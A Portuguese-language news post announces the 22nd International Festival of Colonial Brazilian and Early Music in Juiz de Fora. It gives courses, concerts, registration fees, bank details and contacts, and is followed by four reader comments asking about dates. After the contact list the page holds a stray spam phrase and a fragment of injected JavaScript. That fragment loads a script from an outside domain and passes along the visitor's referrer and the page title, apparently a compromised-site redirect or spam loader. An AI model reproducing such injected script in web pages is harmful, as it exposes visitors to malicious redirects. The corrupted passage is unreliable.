FestivalMinas GeraisNotícia

22º Festival Internacional de Música de Juiz de Fora

O 22º Festival Internacional de Música Colonial Brasileira e Música Antiga está com inscrições abertas para o evento que tem o maior departamento de música antiga do país. A promoção é do Centro Cultural Pró-Música.

O Centro Cultural Pró-Música abre, no dia 1° de junho, inscrições para o 22º Festival Internacional de Música Colonial Brasileira e Música Antiga realizado em Juiz de Fora (MG) entre os dias 17 e 30 de julho. A organização receberá inscrições de cerca de 700 alunos para 48 cursos nas áreas de cordas, sopros, orquestras, vozes e didática da musicalização ministrados por 44 conceituados professores brasileiros e estrangeiros.

O evento, que tem o maior departamento de música antiga do país, oferece cursos de trompa natural, traverso, viola da gamba, violino, violoncelo, cravo, além de canto barroco. Entre as opções também estão os instrumentos modernos e as oficinas para crianças, como a de prática de orquestras. A formação de professores tem espaço com o curso de didática da musicalização infantil.

Este ano, o Festival amplia seu conteúdo teórico com a realização de masterclass internacionais e palestras, ministradas por Paulo Bosísio, Homero Magalhães Filho, Luís Otávio Santos e Rodolfo Valverde. Para o público a novidade é o bate-papo sobre os concertos, toda noite, às 19h30. O professor Rodolfo Valverde fará comentários sobre as atrações e os programas dos concertos.

Na programação cultural, destaque para o alto nível de mais de 30 concertos vespertinos e noturnos, todos gratuitos, em teatros e nas ruas. Entre os pontos altos está a apresentação da Orquestra Barroca do Festival. Formada por músicos de consolidada carreira internacional, a orquestra faz mais um registro em CD da música barroca e colonial interpretada de forma historicamente correta.

O grupo francês Doulce Mémoire tem participação confirmada. O Quinteto Villa-Lobos, o Quarteto Camargo Guarnieri, a Orquestra Filarmônica de Minas Gerais e a Orquestra Ouro Preto também integram a programação. Entre os concertos temáticos, destaque para a execução da “A Arte da Fuga”, de J. S. Bach, pelos cravistas Marcelo Fagerlande e Ana Cecília Tavares, além da integral de “Pièces de clavenci em concert”, de J. P. Rameau, pelo trio formado por Luís Otávio Santos (violinista barroco), Sérgio Álvares (gambista) e Bruno Procópio (cravista).

 

INSCRIÇÕES

Podem ser feitas pelo o site do Pró-Música (www.promusica.org.br) até a véspera do evento, dependendo da disponibilidade de vagas. Os cem primeiros inscritos têm direito a alojamento gratuito e os 150 primeiros recebem alimentação (almoço e jantar) sem custo. As inscrições podem ser feitas no site www.promusica.org.br. A taxa é de R$ 120, por curso em pagamento com cheque nominal ao Centro Cultural Pró-Música ou depósito no Banco do Brasil (agência 0024-8, conta 6745-8). No caso do depósito, o comprovante deve ser remetido junto com a ficha de inscrição por e-mail (promusica@terra.com.br) ou fax (32) 3216-4787.

 

PATROCÍNIO

O 22° Festival tem o patrocínio de Petrobras, UFJF, ArcelorMittal e Prefeitura de Juiz de Fora; apoio de Lei Federal de Incentivo à Cultura, Lei Estadual de Incentivo à Cultura, Funalfa, Institut Français – Consulado Francês, Tribuna de Minas, Colégio dos Jesuítas, TV Panorama e Quilombo Comunicação.

 

INFORMAÇÕES

Todas as informações, inclusive a ficha de inscrição, estão disponíveis no site www.promusica.org.br. Acompanhe o Festival e todas as atividades do Pró-Música no Twitter – @promusicajf

 

Assessoria Pró-Música (32) 3216-4787
Lilian Pace (32) 9112-5581
Fabiola Costa (32) 9982-2422 para que sirve la crema fucidin

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

4 Comments

  1. Olá, gostaria de saber a partir de quando poderei obter informações sobre o Festival Internacional de Música Colonial Brasileira e Música Antiga de Juiz de Fora deste ano? Pois me interessa participar, principalmente, dos cursos de canto. Gostaria de ter informações sobre a programação e as datas, pois como não sou de Minas, estas informações seriam necessárias para o planejamento da viagem.
    grata,
    Lucy.

  2. Dear,
    First of all, my best wishes and success for 2013.
    We are writing to your festival programming for the next edition in 2013.
    We live in Burkina Faso, a group of artists percussionists with traditional artistic dancers named<>: humiliate you, living in Ouagadougou (Burkina Faso).
    We have a new album of eleven tracks on the market and the facebook page.
    Just make sure we inform about the deadline to register and the documents required.
    Sincerely yours ,
    Responsible for the communication and cultural exchange.
    Samir Haidar

  3. Senhores,

    Sou amante da música de época e muito apreciaria conhecer o festival de Juiz de Fora pessoalmente, em sua edição de 2013. Dessa forma, agradeceria se pudesse receber informações sobre as datas de sua realização de modo que eu possa fazer os arranjos para a viagem.
    Eu moro em Mogi das Cruzes, SP e precisaria das informações para preparar e organizar a viagem..
    Antecipadamente grata.

    MariaCristina

  4. Olá, gostaria de saber a partir de quando poderei obter informações sobre o Festival Internacional de Música Colonial Brasileira e Música Antiga de Juiz de Fora deste ano? Pois a minha filha de dez anos ira participar pela primeira vez nos cursos de orquestrinha e canto. Gostaria de ter informações sobre a programação e as datas, pois preciso da programação com mais antecedência para organizarmos a nossa ida. Ela tanto toca o violino como canta, é aluna do IEM Carmem Meting aqui em Salvador / BA. outra informação é sobre onde devemos reservar hospedagem perto do local das atividades se puderem indicar agradeço desde já.

    Cida Tripodi

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.